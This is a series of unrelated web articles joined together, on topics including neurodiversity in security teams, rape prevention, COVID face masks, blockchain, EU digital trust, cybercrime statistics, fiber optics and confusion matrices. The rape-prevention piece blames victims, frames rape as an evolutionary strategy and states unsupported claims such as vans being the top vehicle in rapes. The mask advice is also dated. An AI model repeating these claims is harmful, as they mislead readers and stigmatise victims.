Cybercriminals may have long embraced neurodiversity. With no rules on educational background or hiring practices, the cybercriminal community often simply seeks the person who can do the job best. It's likely that most cybercriminal gang members have different social backgrounds, are of different ethnicity or religion and possess differing levels of education, but that doesn't stop them from breaching some of the largest companies or pulling off massive digital heists.
Consider the cybercriminals diagnosed with Asperger's syndrome who pulled off hacks against the Federal Bureau of Investigation, the US Army, the Missile Defense Agency, and the Federal Reserve. It's safe to speculate that diversity and neurodiversity are no strangers to cybercrime.
Although there is little to no empirical evidence to suggest the relationship between autistic individuals and cyber-driven crimes, some studies have tried to find a link between cybercrime and gifted individuals. However, due to the nature of the Internet and cybercrime, it is difficult to find and prosecute these criminals, let alone study and assess their cognitive abilities.
Strengthening Cybersecurity Efforts
Four in 10 cybersecurity professionals believe communication remains one of the biggest barriers in the cybersecurity industry. Tech jargon brought into the boardroom can significantly hamper board members' understanding of the security risk their organization faces. This, in turn, can negatively affect security budgets because of the lack of perceived risk.
Diversity of talent on cybersecurity teams could potentially solve this communication problem. Building teams with different skill sets ranging outside technical qualifications can have a positive impact.
For example, instead of creating an all-tech team, each with their area of expertise, infosec leaders should consider adding a staff member who's an excellent communicator. He or she could translate technical details and present them in terms non-technical board members can understand, providing clear insight on the organization's security challenges, which in turn could lead to positive outcomes, including improved cybersecurity posture of the organization. Gaining buy-in from board members and achieving cybersecurity objectives is one goal where a non-technical member of a security team can be invaluable.
Incorporating neurodiversity into cybersecurity teams may have additional positive impacts. Employees that are uniquely skilled at finding patterns in seemingly unrelated data or relentlessly pursuing potential signs of data breaches could prove invaluable as part of companies' efforts to detect and respond to threats. While automation currently does most of the heavy lifting in spotting these anomalies, security team members with unique skills and attention to detail may contribute additional insights and correlations that validate findings and even improve tuning of automated systems.
Of course, there's no recipe for success in building diversity and neurodiversity into a cybersecurity team. Motivating people with different skill sets and from across the neurodivergent spectrum may prove challenging, but a growing number of CIOs and CISOs believe neurodiversity in the sector will help combat advanced persistent threats and cyberwarfare.
Striking the balance between using the best security technologies, automation, and people should be a goal for any organization when pursuing a more effective cybersecurity posture. | <urn:uuid:f8824ac4-5e0a-4e7e-9139-626f3ef3a9ea> | CC-MAIN-2022-40 | https://www.darkreading.com/careers-and-people/how-neurodiversity-can-strengthen-cybersecurity-defense | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00403.warc.gz | en | 0.939157 | 1,069 | 3.3125 | 3 |
Tips on how to avoid and prevent rape?
A woman is raped in India every 20 minutes. Rape is an act of violence perpetrated against another person. The topic of rape is not a pleasant one, but it is a subject that women of all ages, races, and nationalities should take seriously enough to find out about.
In the past, people felt safe and secure behind the locked doors of their own homes. Studies have shown that many of the female rapes that took place in 2000 happened inside the victims’ own homes. It is hypothesized that rape is homologous to similar behavior in other animals. "Human rape appears not as an aberration but as an alternative gene-promotion strategy that is most likely to be adopted by the losers in the competitive, harem-building struggle. If the means of access to legitimate, consenting sex is not available, then a male may be faced with the choice between force or genetic extinction."
Ways to prevent rape
- The first reaction is to get away from that danger as quickly as possible and run away screaming for help.
- Learn how to defend yourself from an attack. Take a self-defense course, martial arts, or boxing. Carry pepper spray. When in public, walk confidently and purposefully. Do not act distracted or uncertain. Do not walk around in public chatting on a phone or texting. If you exercise outdoors, do not wear headphones. Vary your routine.
- Areas: Even if it is daytime, late hours, or at night, avoid risk areas such as dark places, dimly lighted areas, lonely places, bushy areas, short-cuts, and being alone in a room with a man other than your husband, fiancé, or brother.
- Alertness: Walk with eyes and ears open, so that you know what is happening around you. Antisocialists can grab you, knock you down, tear your clothes, or even use drugs.
- Mode of dressing: When you are at home, school, place of work, or anywhere else, make sure you wear clothes that do not embarrass you, or which attract too much negative attention from men/boys.
- When a man starts seductive signals, praises, and giving you gifts, be careful to avoid and say no to all these.
- Use your cell phone as a safety tool. Make sure it’s fully charged before you go out, and if you find yourself in a sketchy situation, use it to call for help or to let someone know where you are.
- Company: It is a good practice especially when it’s late to walk in the company of known friends, workmates or schoolmates. In case antisocialists strike, they can easily raise alarm and get help when you are many.
- Do not accept money, sweet things, and snack foods from people you do not know, watchmen, or even male neighbors.
- Do not accept lifts from people you do not know, these could be cars, bikes, or motorbikes.
- Suspicion: Never trust men completely unless he is your husband or fiancé. Antisocialists can be strangers or people whom you know well; they do not have outward signs.
- Parental guidance: Try to avoid sending your daughters late at night to the shops, river, other peoples’ homes’ or anywhere else. Do not leave your daughters no matter how young with male strangers or distant relatives you are not sure of.
- Practice being careful when going into your house or car because someone could easily push you in and lock the door behind you. Be aware of your surroundings; carry your keys ready in your hand and look around you before opening the door.
- Keep personal information private. Don’t advertise your info verbally or on the Internet. Also, be very wary of meeting up with anyone whom you meet on the Internet. There is never a good reason to meet up with a person whom you have never met in person, or who talks you into meeting up when you are hesitant. If you think you must do so, bring someone else, preferably a friend who is older, and meet the person in a public place.
- Walk with confidence. Look up as you walk and stand up straight; pretending as though you have two big panthers on either side of you as you walk may sound silly, but it can help boost confidence. Attackers are more likely to go for those who they think cannot defend themselves.
- Make eye contact if you are being followed by someone who you think is a potential threat. An attacker may be less likely to strike if they think you will be able to clearly identify them.
- Be mysterious online. Think twice before leaving status or away messages and when using the check-in feature on Facebook or Foursquare. Posting your whereabouts exposes details that are accessible to everyone, and allows people to track your movements. Think of it like this: If you wouldn’t reveal the info to a stranger, then don’t put it on your profile.
- Avoid going out at night. If you happen to be out at night, make sure it is a well-lit, crowded, main street and you are with at least one other person. Carry your cell phone in your hand ready to make a call, and, if you have one, a key in the other one to be used as a weapon.
- When at home, play it safe by never letting people into your home that you do not know. If it is a handyman, cable repair, etc., tell them you need to see a photo ID and their truck. If you don’t trust them instantly then do not let them in. If they do not look you in the eyes, have a photo ID, drive a truck with the company name on it, or wear a uniform, that is suspicious behavior. Do not let them into your home! Ask them to call the company while they wait outside then have the company call you or call the company yourself.
- Do not be distracted, especially by technology. Do not jog with your iPod because attackers are looking for easy, distracted individuals who look like they are not paying attention to their surroundings. The same can be said for talking on your cell phone. But, on the other hand, if you feel someone is following you, pull out your cell phone and pretend to be talking to someone because your "conversation partner" would be aware of an attack. If your potential attacker is going for "no witnesses," they might back off and change their mind. You can even pretend you are meeting up with someone and they are already here/heading this way VERY soon. Don’t say "5 minutes" or the attacker may only decide to take action quicker. If they think you are in safe hands or will be in less than a minute, they might back off.
- Be aware of your surroundings at all times. Parking lots and parking garages are two of the sites that are most often targeted by attempted rapists. These men are predators, so view your surroundings carefully. If you are in a parking lot and feel someone is following you, start making noise - talk to yourself loudly, talk to an imaginary person, or pretend to talk on your cell phone. The louder the potential victim, the more the predator is apt to freeze.
- Carry defensive items only if you know how to use them. Remember, any "weapon" that could hurt a potential attacker can be used against you if you are not well trained and comfortable with it. Remember that even an umbrella or purse can be used as a weapon against an attacker, and has less chance of being turned against you.
- Understand that Vans are the #1 vehicles used in rapes. Rapists will park next to the driver’s side and, as you are trying to get in, they will pull you into the van. If there is a van on the driver’s side of your car, go in through the passenger’s door. If there are vans on both sides, go back to where you were and get someone like a security guard to walk you to your car. Don’t park in any place that feels unsafe.
Keep in mind
Avoid situations and lifestyles that could lead you to be raped. Not all men are bad; only a few misbehave, and most are very respectful, caring and good fathers, husbands, brothers, uncles, grandfathers, neighbors, and friends. So do not condemn them in general. | <urn:uuid:2a7177ea-256f-467c-9431-acfc848b96fd> | CC-MAIN-2022-40 | https://www.knowledgepublisher.com/article/1135/tips-on-how-to-avoid-and-prevent-rape.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00403.warc.gz | en | 0.962195 | 1,743 | 3.015625 | 3 |
For weeks, we’ve heard conflicting information on whether we should wear masks in public. Of course, anyone diagnosed with COVID-19 should stay home and wear a mask to protect those who are not ill. Caregivers for anyone with COVID-19 should also wear a mask. But what about everyone else?
The Centers for Disease Control and Prevention (CDC) now recommends people wear cloth or fabric face masks in public. Wearing masks is voluntary, so should you do it?
The short answer is, again, yes. Everyone should wear a face mask in public: in grocery stores, in pharmacies, when taking public transportation, when answering your door, especially on airplanes, buses, subways, Uber and Lyft, and everywhere else people gather.
Keep reading to find out what kind of mask you should wear and the safest way to do so.
Why the mixed messages?
Since the start of the coronavirus spread in the U.S., the CDC has said masks were only necessary in public for those infected, showing symptoms or taking care of someone who was. The World Health Organization said the same.
Perhaps the CDC was attempting to conserve face masks for hospitals and first responders. America believed that message — for a while.
But the evidence from South Korea, Hong Kong and other parts of Asia where wearing face masks in public is an ordinary part of daily life, the spread of the virus is reduced — so much so that on April 2, the White House changed its position on face masks.
Now, two questions emerge: What kind of mask should you wear? And how do you put them on without contaminating the mask or yourself?
Which mask is right for me?
There are several varieties of masks floating around on the web and in stores, but which one is the best for your health? Well, the answer depends on a couple of factors — namely what’s in stock at the moment and how far you want to go in terms of protecting yourself.
When it comes to simple face masks, the N95 respirator is clearly one of the best you can buy. The name “N95” refers to the fact that the mask is “Not resistant to oil” (meaning it is not rated for oil-based aerosols) and filters at least 95% of airborne particles.
These masks are also certified by both the WHO and CDC for medical use and are in high demand from doctors around the country.
That’s also the reason the CDC is shooing the public away from them. Right now, they’re in short supply and needed in hospitals. Some eBay sellers are offering so-called KN95 masks, saying they’re as good as the N95. But KN95 masks are made in Chinese factories not certified safe by the Food and Drug Administration.
If you want to order these, you might be out of luck. Most online retailers are barred from selling N95 respirators altogether, and some international sellers are taking advantage of the shortage to sell them at ridiculously high prices. Let the buyer beware.
Most health organizations recommend these cheap, disposable masks for regular use by civilians. These masks are multi-layered and are able to protect against liquid droplets, which are a primary vector of COVID-19 transmission.
What these masks do not protect against, however, are airborne particles that may include the SARS-CoV2 virus. Think of surgical masks as a basic precautionary measure to use on top of standard social distancing and isolation practices.
These masks are a bit easier to acquire and can be purchased from CVS and Walmart for about $13 for a set of 50. Shipping estimates are pushed all the way out to May, unfortunately.
These masks are designed for aerobic cyclists who bike in heavily polluted areas. As such, they contain an air filter built into the front, which can be useful for filtering out harmful particles.
These masks, while effective, are not regulated to the same standard as medical-grade masks. As such, you shouldn’t expect it to fully protect you from viral particles in the air. Use a cycling mask more as a tool for peace of mind than for full protection.
Cycling masks are currently sold out at most sporting goods stores, but some retailers on Amazon have them for sale for up to $44 a pop. Most shipping estimates put delivery around June of this year.
A literal gas mask
Unless you’re ready to head to those ghastly trenches from the Great War, you probably won’t need a full-fledged gas mask. Heavy metal fans and gothic ravers have long made use of this wartime protective gear for aesthetic purposes, but COVID-19 has caused a significant spike in demand from the general public.
A variety of these masks are available in prices ranging up to hundreds of dollars for military-certified gear. You’ll have to purchase them from an army surplus store, such as this one from the Czech Republic, but don’t expect your order to arrive anytime soon. International shipping is experiencing heavy delays thanks to the virus.
Oh, and you’ll also look extremely paranoid wearing this in public. We’d recommend saving this one for the doomsday bunker instead.
Simple cloth masks, bandanas and scarves
The good news is that for general use and wearing a mask in public for prevention, N95 masks and other protective headgear are NOT necessary. Cloth masks, which are all the rage in both the fashion world and online stores, are fine, fairly inexpensive and easy to wear.
Many of these masks are available from apparel retailers and crafts stores like Etsy for around $20. The masks themselves are reusable and should be thoroughly washed each time you’re finished with them. These masks do not offer full-fledged particle filtration, but instead, add a layer of protection to your face that wouldn’t be there otherwise.
Plus, they’re plenty effective at keeping viral particles in on the off chance that you’re an asymptomatic carrier. The same goes for surgical masks, which are actually better at protecting others from your droplets than the other way around.
If you cannot find cloth or surgical masks, you can use a clean bandana or scarf. You may look like you’re about to rob a stagecoach, but you’re adding a measure of personal safety.
How to wear a mask safely
So whether it’s a mask, scarf or bandana, BEFORE you put in on, wash your hands for AT LEAST 20 seconds in hot soapy water, dry your hands with a clean paper towel and throw the paper towel away.
If you’re using a mask, it has two strings that loop behind your ears. Put the mask on and open it up to cover above your nose and below your chin. It’s folded in two places like an accordion.
If the mask has a nose clip, like a surgical mask, pinch the clip snugly to the shape of your nose. This will prevent gaps in the mask, as well as slippage during wear.
While wearing it, do not touch the mask. Promptly take it off and throw it away before walking into your home. Then, wash your hands again.
For scarves and bandanas, make sure they are freshly cleaned. Tie it around your face, covering your nose and mouth. Again, while wearing, do not touch it.
Promptly take it off before walking into your home and put it right in the wash. Set your washer and dryer to sterilize if you have that setting available, or use the hottest water setting you can. Then wash your hands again.
Remember: Always assume everyone you meet has the virus and act accordingly. The only surefire way to prevent contracting the virus is to avoid being exposed to anyone who has it.
The information contained in this article is for educational and informational purposes only and is not intended as health or medical advice. Always consult a physician or other qualified health provider regarding any questions you may have regarding a medical condition, advice, or health objectives. | <urn:uuid:0c4687eb-fc81-47eb-992c-d0f7d6c524fe> | CC-MAIN-2022-40 | https://www.komando.com/coronavirus/covid-19-face-mask-tips/733714/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00403.warc.gz | en | 0.947939 | 1,707 | 2.640625 | 3 |
Blockchain-related topics are gaining a lot of attention lately, with most of that attention focused on cryptocurrencies such as Bitcoin. Some predict it will be the next internet revolution, one that could lead to new technological innovations and to economic and social transformations.
Blockchain runs on a peer-to-peer network of many distributed nodes, supported by independent computer servers around the globe. It operates without any centralized authority and has built-in fraud protection and a consensus mechanism, such as Proof-of-Work, in which peer nodes approve every new block of transactions before it is added to the shared database, also known as the "block chain."
It also has built-in checks and balances to ensure that a set of colluding computers can't game the system. Blockchain also brings in an element of transparency, which reduces fraud because the entire chain is visible and auditable.
But how will Blockchain bring innovation to businesses in performing business continuity and disaster recovery?
Peer-to-Peer Fault-Tolerant. When a disaster happens and destroys some network nodes or a cyber attack penetrates the network, this will not hinder the operation of the rest of the network because every node has a copy of the Blockchain ledger due to its decentralized nature.
Availability. It provides 24/7/365 availability without using any complex technologies, like a disaster recovery center or database redundancy.
Smart Contract. Blockchain can store program code that triggers once given conditions or deliverables are met. This code is stored in a block and can call system APIs or web services such as alert notifications, transaction rollback procedures, network lockdown and backup procedures during disaster recovery or business continuity exercises (a simplified sketch of this trigger pattern follows this list).
Secure and reliable. Security and fraud protection are also built into Blockchain. It employs advanced cryptography that is close to impossible to break, making the ledger tamper-proof, so every transaction is highly reliable.
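Smart contracts themselves are written in blockchain-specific languages such as Solidity, but the trigger pattern described in the Smart Contract point above, where stored code fires predefined recovery actions once a condition is met, can be sketched in plain Python. The conditions, thresholds, and action names below are invented purely for illustration and are not blockchain code:

```python
from dataclasses import dataclass
from typing import Callable, Dict

@dataclass
class RecoveryTrigger:
    """Pairs a monitored condition with the recovery action to run when it becomes true."""
    name: str
    condition: Callable[[Dict[str, int]], bool]
    action: Callable[[], None]

def notify_operations() -> None:
    print("alert: notifying the operations team")        # stand-in for a real alerting API

def lock_down_network() -> None:
    print("action: locking down the affected segments")  # stand-in for a real lockdown procedure

TRIGGERS = [
    RecoveryTrigger("node outage",
                    lambda s: s["healthy_nodes"] < s["total_nodes"] // 2,
                    notify_operations),
    RecoveryTrigger("suspected breach",
                    lambda s: s["failed_auth_attempts"] > 100,
                    lock_down_network),
]

# Hypothetical network state reported by monitoring.
state = {"healthy_nodes": 3, "total_nodes": 10, "failed_auth_attempts": 7}

for trigger in TRIGGERS:
    if trigger.condition(state):
        trigger.action()
```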
Even though Blockchain is still in its infancy, much like the internet in the late 1990s, awareness is high, and some technology entrepreneurs and businesses have started developing proofs-of-concept and use cases that can later become real solutions to real problems.
Reach out for a no obligation, initial conversation. | <urn:uuid:65442842-98d4-4b53-835e-d6ba3a0f28a7> | CC-MAIN-2022-40 | https://infiniteblue.com/blockchain-for-business-continuity-and-disaster-recovery/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00403.warc.gz | en | 0.939703 | 467 | 2.828125 | 3 |
Globalization has continued its inexorable march over the last decades. The movement of everything from capital, labor, ideas, goods, and services across borders has made the world a smaller place. International organizations create the rules that define and guide interactions between people and nations. In parallel, we are seeing another revolution - digitizing our economy at a breath-taking pace.
But what happens when you combine the two? As digitized as countries may be, when their economies interact with each other, they still seem stuck in the 90s. This is because countries have their own unique digital systems in place that often don’t connect well with another country’s systems. This mismatch has always existed because of language, legal or physical barriers. But in the digital age, it shouldn’t exist.
The European Commission has made great strides toward achieving the Digital Single Market across all member states. EU initiatives like eIDAS, PSD2, AML4, and others pave the way toward a cross-border system of digital identities and communication.
Perhaps this experience of trying to create a harmonized system among this group of diverse states places Europe in a prime spot to take the initiative globally.
The European Telecommunications Standards Institute (ETSI) conducts workshops on the globalization of trust several times a year. These workshops are held not only in Europe but also in various locations across the world. Clearly, the focus is global. The aim of these workshops is to reach a consensus on the international recognition of national / regional PKI-based trust services schemes.
Why do we need Global Trust?
Some answers to this question are obvious. The trade of goods and services across national boundaries will undoubtedly be made smoother and faster if trust between the trading partners could be established through such schemes. With the mutual recognition and acceptance of national eID / trust schemes, friction in international trade can be minimized.
But there are also some not-so-obvious answers. In addition to promoting the global economy, this is also about gaining competitive advantages both at a macro level and for companies back home. By taking the lead on such initiatives, a country can influence the development of global standards in a way that matches its own preferences. Additionally, its own companies can also participate in the process and they would undoubtedly find it easier to adapt to a global system that is very similar to what they have locally.
The Full Package
A global digital trust system also requires a mutually recognized legal framework and a compatible technological infrastructure.
Creating these systems takes time since the various global participants often have conflicting views on how to proceed, which is why starting early and starting small can be a viable strategy.
Within the EU, the various directives provide a solid and complete framework for the Digital Single Market.
Adopting something similar on a global scale would be much more challenging, but given the sheer volumes of trade at stake, it would be equally rewarding.
References and Further Reading
- Selected articles on eIDAS (2014-today), by Gaurav Sharma, Guillaume Forget, Jan Kjaersgaard, Dawn M. Turner, and more
- Benefits of the eIDAS Toolbox – Case Studies from Various Industries (Part 1) (2018), by Gaurav Sharma
- Benefits of the eIDAS Toolbox – Case Studies from Various Industries (Part 2) (2018), by Gaurav Sharma
- Digital Trade and Trade Financing - Embracing and Shaping the Transformation (2018), by SWIFT & OPUS Advisory Services International Inc
- REGULATION (EU) No 1316/2013 establishing the Connecting Europe Facility, amending Regulation (EU) No 913/2010 and repealing Regulations (EC) No 680/2007 and (EC) No 67/2010(12/2013), by the European Parliament and the European Council
- Selected articles on Electronic Signing and Digital Signatures (2014-today), by Ashiq JA, Gaurav Sharma, Guillaume Forget, Jan Kjaersgaard , Peter Landrock, Torben Pedersen, Dawn M. Turner, and more
- The European Interoperability Framework - Implementation Strategy (2017), by the European Commission
- Proposal for a DIRECTIVE OF THE EUROPEAN PARLIAMENT AND OF THE COUNCIL amending Directive (EU) 2015/849 on the prevention of the use of the financial system for the purposes of money laundering or terrorist financing (2016), by the European Commission
- REGULATION (EU) 2016/679 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation) (2016), by the European Parliament and the European Council
- Proposal for a REGULATION concerning the respect for private life and the protection of personal data in electronic communications and repealing Directive 2002/58/EC (Regulation on Privacy and Electronic Communications) (2017), by the European Parliament and the European Council
- Revised Directive 2015/2366 on Payment Services (commonly known as PSD2) (2015), by the European Parliament and the Council of the European Union
- REGULATION (EU) No 910/2014 on electronic identification and trust services for electronic transactions in the internal market and repealing Directive 1999/93/EC (2014) by the European Parliament and the European Commission
- DIRECTIVE 2013/37/EU amending Directive 2003/98/EC on the re-use of public sector information (2013), by the European Parliament and the Council
Over the past year, 330 million people fell victim to cybercrime, new research shows. Even though Americans claim to have taken certain precautions against cybercrime, around 40% of them still don’t know how to stay safe online.
“Cybercriminals have taken advantage of our changing behaviors and increased digital footprint,” Paige Hanson, chief of cyber safety education at NortonLifeLock, said.
The research by NortonLifeLock revealed that in the past year, nearly 330 million people across ten countries became victims of cybercrime, and more than 55 million people became victims of identity theft. Cybercrime victims collectively spent almost 2.7 billion hours trying to resolve their issues.
“This past year has been incredibly challenging as we’ve navigated the emotional and physical effects of a global pandemic. What’s more, there is the added concern for the online health and safety of our families as we spend more time online,” Hanson said.
The annual Norton Cyber Safety Insights Report also found that one-quarter of Americans (25%) detected unauthorized access to an account or device in the past 12 months. This research was conducted online in partnership with The Harris Poll among over 10,000 adults in 10 countries, including 1,000 in the United States.
In the past 12 months, nearly 108 million Americans experienced cybercrime. On average, they spent 6.7 hours trying to resolve the related issues. That means Americans lost around 719 million hours to cybercrime over the past year. Nearly half of Americans feel more vulnerable to cybercrime than they did before the pandemic.
Time spent online has increased significantly since the start of the pandemic, and not everyone is able to determine if the information they see online is from a credible source. These are considered to be the key drivers of peoples’ cybercrime insecurity.
73% of Americans say they are spending more time online than ever before, with 59% saying they are more worried about becoming a victim of cybercrime and 56% admitting it’s difficult for them to determine if the information they see online is credible. Furthermore, 76% believe that remote work has made it much easier for hackers and cybercriminals to take advantage of people.
However, researchers are starting to see a silver lining with consumers fighting back and trying to protect themselves online. 77% of Americans claim they have taken more precautions while surfing the net. Almost all Americans, who detected unauthorized access to an account or device, took some action, such as creating a stronger password(s) (66%) or contacting the company the account was hacked from (51%). Many turned to a family member(s) (33%) or the internet (31%) for help, while others invested more in security software through first-time purchases or doubled down on pre-existing subscriptions (18%).
Although Americans started taking more precautions, two in five of the respondents still admit they don’t know how to protect themselves from cybercrime. Nearly half of Americans would have no idea what to do if their identity was stolen.
In fiber optics, data is transmitted as light pulses sent through thin glass strands. The performance of these cables is measured in decibels (dB), which indicate how much optical power the light retains as it moves through the cable. The goal is to deliver as close to 100% of the launched power as possible, so measuring how much is lost in transit indicates how well the cable performs. This measurement is called dB loss. Too much light loss leads to failure and signifies that the fiber cable is not up to industry standards. So how can you make sure your fiber cables are not suffering significant dB loss? Read on to learn what causes this loss and what measures can be taken to avoid it.
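To make the decibel figure concrete, the short Python sketch below converts launch and received optical power into a dB loss value. The power numbers are made-up examples, not measurements from any particular cable or standard:

```python
import math

def db_loss(power_in_mw: float, power_out_mw: float) -> float:
    """Attenuation in dB between the power launched into the fiber and the power received."""
    return 10 * math.log10(power_in_mw / power_out_mw)

# Hypothetical link: 1.0 mW launched, 0.85 mW arrives at the far end.
loss = db_loss(1.0, 0.85)
print(f"Link loss: {loss:.2f} dB")                   # ~0.71 dB
print(f"Power delivered: {0.85 / 1.0:.0%} of launch power")
```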
How dB Loss in Fiber Cables Happens
You should consider dB loss early, even before installation occurs. Cables built to provide the lowest possible dB loss help ensure the best data transmission. Although these cables might have a higher price point, their durability makes them well worth the cost.
However, after installation, dB loss may be caused by end-point contamination. Touching connector ends can contaminate the transmission of light by smearing the glass ends with dirt and oil common on fingers. A scope can inspect the cable end faces, and a special cleaner can be used to ensure a pristine surface. If your fiber optic cable is defective, it may just need to be cleaned. Rather than throwing out cables, contact a professional fiber optic cable contractor who has the expertise and tools to carefully examine the fiber cables and return them to a pristine condition.
Why It is Important to Minimize dB Loss
The power of your fiber optic cables lies in their ability to transmit important information and data cleanly. A mediocre cable or a poor installation of a good one can devalue your data and deprive you of vital high-speed data transmission.
It is essential then to hire experienced fiber optic cable technicians who can properly install cables and take measures to avoid data loss and network failure. Many organizations consider data to be their most valuable asset. The quickest way to lose this asset is through poor data transmission. By selecting the right cables and installation, you can ensure that your network’s dB loss remains low throughout its lifetime.
Get in Touch with FiberPlus
FiberPlus has been providing data communication solutions for over 25 years in the Mid Atlantic Region for a number of different markets. What began as a cable installation company for Local Area Networks has grown into a leading provider of innovative technology solutions improving the way our customers communicate and keeping them secure. Our solutions now include:
- Structured Cabling (Fiberoptic, Copper and Coax for inside and outside plant networks)
- Electronic Security Systems (Access Control & CCTV Solutions)
- Wireless Access Point installations
- Public Safety DAS – Emergency Call Stations
- Audio/Video Services (Intercoms and Display Monitors)
- Support Services
- Specialty Systems
- Design/Build Services
- UL2050 Certifications and installations for Secure Spaces
FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
Have any questions? Interested in one of our services? Call FiberPlus today 800-394-3301, email us at email@example.com, or visit our contact page. Our offices are located in the Washington, DC metro area, Richmond, VA, and Columbus, OH. In Pennsylvania, please call Pennsylvania Networks, Inc. at 814-259-3999. | <urn:uuid:e3692840-5148-4fe0-a775-c5a0b752768b> | CC-MAIN-2022-40 | https://www.fiberplusinc.com/helpful-information/db-loss-prevention/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00403.warc.gz | en | 0.932436 | 722 | 2.828125 | 3 |
Upon completing this course, you will have learned how to:
– Understand the background and definition of PSTN
– Understand regulatory considerations and timeline
– Describe the impact on services in the telecom environment
– Evaluate risks associated with PSTN transitioning
– Understand PSTN transitioning strategy considerations
This course will provide an overview of what Public Switched Telephone Network (PSTN) transitioning is, what enterprises need to know and how they should prepare for it. The Federal Communications Commission (FCC) has accelerated the timeline on transitioning the legacy technology in the public switched telephone network to IP-based services. This transition will affect all Plain Old Telephone Service (POTS) and Time Division Multiplexing (TDM) – based voice services and organizations must establish a strategy to migrate PSTN to IP services as the underlying technology of the public telephone network changes. | <urn:uuid:9e22d2a1-4c66-45ca-9be3-70529ded835a> | CC-MAIN-2022-40 | https://aotmp.com/product/pst-pstn-transitioning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00403.warc.gz | en | 0.913786 | 174 | 2.703125 | 3 |
A confusion matrix is a performance measurement technique for a machine learning classification algorithm. Data scientists use it to evaluate the performance of a classification model on a set of test data when the actual values are known. Classification accuracy alone can be misleading, especially when the dataset has an unequal number of observations in each class or more than two classes.
Consequently, calculating the confusion matrix helps data scientists understand the effectiveness of the classification model.
The confusion matrix visualizes the accuracy of a classifier by comparing the actual values and the predicted values. In addition, it presents a table layout of the different outcomes of the prediction, such as the table below:

| | Predicted: Positive | Predicted: Negative |
|---|---|---|
| Actual: Positive | True Positive (TP) | False Negative (FN) |
| Actual: Negative | False Positive (FP) | True Negative (TN) |
Let's decipher the confusion table: each row corresponds to the actual class of a sample, and each column to the class the model predicted, so every cell counts how many samples fall into that combination.
Now that we have deciphered the confusion table, let's understand each value.
Let’s consider the following example to understand the confusion matrix and its values better. Suppose we want to create a model that can predict the number of patients suffering from migraines.
In this case, a positive result means the model predicts that a patient suffers from migraines: a true positive is a migraine patient correctly identified, a true negative is a healthy patient correctly identified, a false positive is a healthy patient incorrectly flagged, and a false negative is a migraine patient the model misses.
Let's consider the following numbers, which are used in the calculations that follow: TP = 100, FP = 20, FN = 30, and TN = 150.
Let's break the numbers down: the model correctly identified 100 patients with migraines and 150 patients without, while it incorrectly flagged 20 healthy patients and missed 30 patients who do suffer from migraines.
Consequently, the true positives and the true negatives tell us how many times the algorithm correctly classified the samples. On the other hand, the false negatives and false positives indicate how many times the algorithm incorrectly made predictions.
Once we have filled out the confusion matrix, we can perform various calculations for the model to understand its accuracy, error rate, and more.
Once the confusion matrix has determined the number of True Positives (TP), True Negatives (TN), False Negatives (FN), and False Positives (FP), scientists can determine the model’s classification accuracy, error rate, precision, and recall.
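In practice, data scientists rarely tally these four counts by hand; a library such as scikit-learn can derive them from the actual and predicted labels. The label vectors below are made up solely to illustrate the call:

```python
from sklearn.metrics import confusion_matrix

# 1 = patient suffers from migraines, 0 = patient does not (illustrative labels only)
y_true = [1, 1, 1, 0, 0, 0, 1, 0, 1, 0]   # actual values
y_pred = [1, 0, 1, 0, 0, 1, 1, 0, 1, 0]   # model predictions

# With labels=[0, 1], the matrix rows are the actual classes and the columns the
# predicted classes, so ravel() returns the counts in the order TN, FP, FN, TP.
tn, fp, fn, tp = confusion_matrix(y_true, y_pred, labels=[0, 1]).ravel()
print(f"TP={tp} FP={fp} FN={fn} TN={tn}")
```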
Classification accuracy is one of the most critical parameters to determine because it defines how often the model predicts the correct output. The higher the accuracy, the better the model. To calculate the model’s accuracy, consider the following formula:
Accuracy = (TP + TN) / (TP + FP + FN + TN)
Let's consider the example of predicting patients with migraines. In that instance, the accuracy of the machine learning algorithm is (100 + 150) / (100 + 20 + 30 + 150) ≈ 0.83
This means that the machine learning algorithm is 83% accurate in its predictions.
Also referred to as the error rate, the misclassification rate defines how often the model makes incorrect predictions. The error rate is calculated through the following formula:
Error rate = (FP + FN) / (TP + FP + FN + TN)
Based on the example above, the misclassification rate is (20 + 30) / (100 + 20 + 30 + 150) ≈ 0.17
Hence, the machine learning algorithm is 17% inaccurate in its predictions.
Precision compares the number of correct outputs provided by the model (true positives) to the total number of classified positive samples (true positives and false positives). It is one indicator of the model’s performance and helps scientists measure its ability to classify positive samples.
The model’s precision can be calculated using the following formula:
Precision = TP / (TP + FP)
In our case, precision equals 100 / (100 + 20) ≈ 0.83
This means that out of all the positive predictions, 83% were true.
Recall lets data scientists measure the model’s ability to detect positive samples. The higher it is, the more positive samples the model has detected.
It is calculated as the ratio between the number of positive samples correctly classified (TP) and the total number of actual positive samples.
Recall = TP / (TP + FN) = 100 / (100 + 30) ≈ 0.77
This means that out of all the actual positive cases, only about 77% were predicted correctly.
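The same arithmetic can be checked with a few lines of Python using the counts from the worked example above:

```python
# Counts from the migraine example: TP = 100, FP = 20, FN = 30, TN = 150
TP, FP, FN, TN = 100, 20, 30, 150

accuracy = (TP + TN) / (TP + FP + FN + TN)    # ~0.83: how often the model is right
error_rate = (FP + FN) / (TP + FP + FN + TN)  # ~0.17: how often the model is wrong
precision = TP / (TP + FP)                    # ~0.83: quality of the positive predictions
recall = TP / (TP + FN)                       # ~0.77: share of actual positives detected

print(f"accuracy={accuracy:.2f}, error rate={error_rate:.2f}, "
      f"precision={precision:.2f}, recall={recall:.2f}")
```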
| Precision | Recall |
|---|---|
| Helps data scientists measure the model's ability to classify positive samples correctly | Helps data scientists measure how many of the actual positive samples the model correctly classified |
| Calculated over every sample the model classified as positive, so both truly positive and truly negative samples enter the calculation | Calculated only over the samples that are actually positive |
